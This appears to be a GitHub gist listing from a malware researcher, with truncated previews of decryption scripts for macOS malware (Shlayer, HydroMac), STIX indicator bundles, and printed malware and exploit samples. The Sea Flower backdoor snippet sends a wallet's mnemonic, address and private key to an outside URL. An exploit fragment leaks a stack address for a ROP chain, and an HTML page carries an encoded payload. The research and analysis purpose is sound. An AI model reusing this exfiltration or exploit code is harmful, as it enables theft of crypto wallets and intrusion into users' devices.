tahaconfiant
/ shlayer_decrypt.py
Created
December 23, 2022 15:14
command line script to decrypt OSX/Shlayer.F C2 configuration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # author : [email protected] aka lordx64 | |
| # OSX/Shlayer.F C2 config extracting from DMG files | |
| # copyright 2022 - All rights reserved | |
| # compatible python 3.8 | |
| # Note on installation on mac: | |
| # brew install gmp | |
| # then: env "CFLAGS=-I/usr/local/include -L/usr/local/lib" pip3 install pycrypto | |
| from Crypto.Cipher import AES | |
| import argparse |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function startupload() | |
| { | |
| if(xlmnmonic!="" && xlmnmonic!=null && xladdress!=null) | |
| { | |
| var demoString = xlmnmonic+"@"+xladdress+"@"+xlPrivateKey; | |
| fdsafasdf("https://trx.lnfura.org/api/metamask/ios/GDBPXJ1EXQXWFUAGZRIH3FOVR0SO0VDJLIZLVE1LYOXZECZ61FDC1EHNSPX7KDZWIENCPV7H3KRYNOIENCRTDOIHV2RPKMG4CC4UIDVIJJUTGAIWU7MV6BR8LPJA6XT5",demoString); | |
tahaconfiant
/ seaflower.js
Created
June 12, 2022 08:30
Sea Flower backdoor React Native bundle - variant 2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var monic = ""; | |
| var xlhookTime = 0; | |
| var xldata = ""; | |
| var xlPdata = ""; | |
| var xlcaches = {}; | |
| var xlpcaches = {}; | |
| var xlpwd = null; | |
| var xlepwd = null; | |
| function mcode(str) | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| encrypted string at 0x100051a6a decoded to : | |
| encrypted string at 0x100051b2c decoded to : IOPlatformExpertDevice | |
| encrypted string at 0x100051ff5 decoded to : | |
| encrypted string at 0x100051ffe decoded to : BadAllocException | |
| encrypted string at 0x100052057 decoded to : - | |
| encrypted string at 0x100052060 decoded to : OutOfRangeException | |
| encrypted string at 0x100051e12 decoded to : - | |
| encrypted string at 0x100051e1b decoded to : BadAllocException | |
| encrypted string at 0x100051e74 decoded to : - | |
| encrypted string at 0x100051e7d decoded to : OutOfRangeException |
tahaconfiant
/ hydromac_decrypt.py
Created
June 3, 2021 17:42
HydroMac IDAPython script to decrypt strings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # author : [email protected] aka lordx64 | |
| # copyright 2021 - All rights reserved | |
| # tested against macOS/Hydromac sample (aka MapperState) 919d049d5490adaaed70169ddd0537bfa2018a572e93b19801cf245f7fd28408 | |
| # compatible python 3.8, and IDAPython for IDA 7.6.210319 | |
| # this HydroMac String decryptor uses a helper class UEMU_HELPERS taken from https://github.com/alexhude/uEmu project | |
| import idc | |
| import struct | |
| import idautils | |
| from abc import ABC, abstractmethod |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "type": "bundle", | |
| "id": "bundle--1085f2d7-28e4-42cd-a8f5-deb2f065902f", | |
| "objects": [ | |
| { | |
| "type": "domain-name", | |
| "id": "domain-name--b90b246a-0b50-5c64-80d1-0d118efd9ef6", | |
| "value": "pophot.website", | |
| "spec_version": "2.1" | |
| }, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "type": "bundle", | |
| "id": "bundle--7dca0b30-9c3f-4978-8b2a-b83851bfc37a", | |
| "objects": [ | |
| { | |
| "type": "ipv4-addr", | |
| "id": "ipv4-addr--94f94345-3a11-5654-aacd-61496d6f5409", | |
| "value": "103.224.82.234", | |
| "spec_version": "2.1" | |
| }, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var aA = S(O, V(O)); | |
| var aB = ((aA.charCodeAt(4) << 16) | aA.charCodeAt(3)) - 0x44; // <--- points to a return address in the native stack | |
| for (var A = 0; A < 10; A++) V(aB - (0x1000 * A)); | |
| var aC = aB - 0x2000; // <--- will be used for the ROP chain layout | |
| //<code skipped> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var test = new RegExp("CAFEBABE"); | |
| test.source; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <script> | |
| function myFunction() { | |
| var l = "\u614E\u4B74\u01c8\u0000\u0024\u0000\u0159\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000" + "\u1E12\u0001\u1200\u0009\u0000\u740A\u1100\u770A\u0400\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\u0D03\u0000\u0000\u0000\u6F00\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0000\u0000\u0D03\u0000\uFE00\uFFFF\u00FF\u0000\u0400\uFFEF\uFFFF\u000B\u0000\u0000\u0000\uFFFF\uFFFF\u2B04\u0000\u0000\u0000\u0000\u0000\uFF00\uFFFF\u03FF\u000D\u0000\uFFF3\uFFFF\u000E\u0000\u0112\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0016\u0000\u0D03\u0000\u0B00\u0000\u0700\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u001A\u0000\u0D03\u0000\u0B00\u0000\u0000\u0000\u0300\u000D\u0000\uFFFB\uFFFF\u0000\u0000\u0D03\u0000\uF300\uFFFF\u1BFF\u0000\u1500\u1312\u0000\u0300\ |
NewerOlder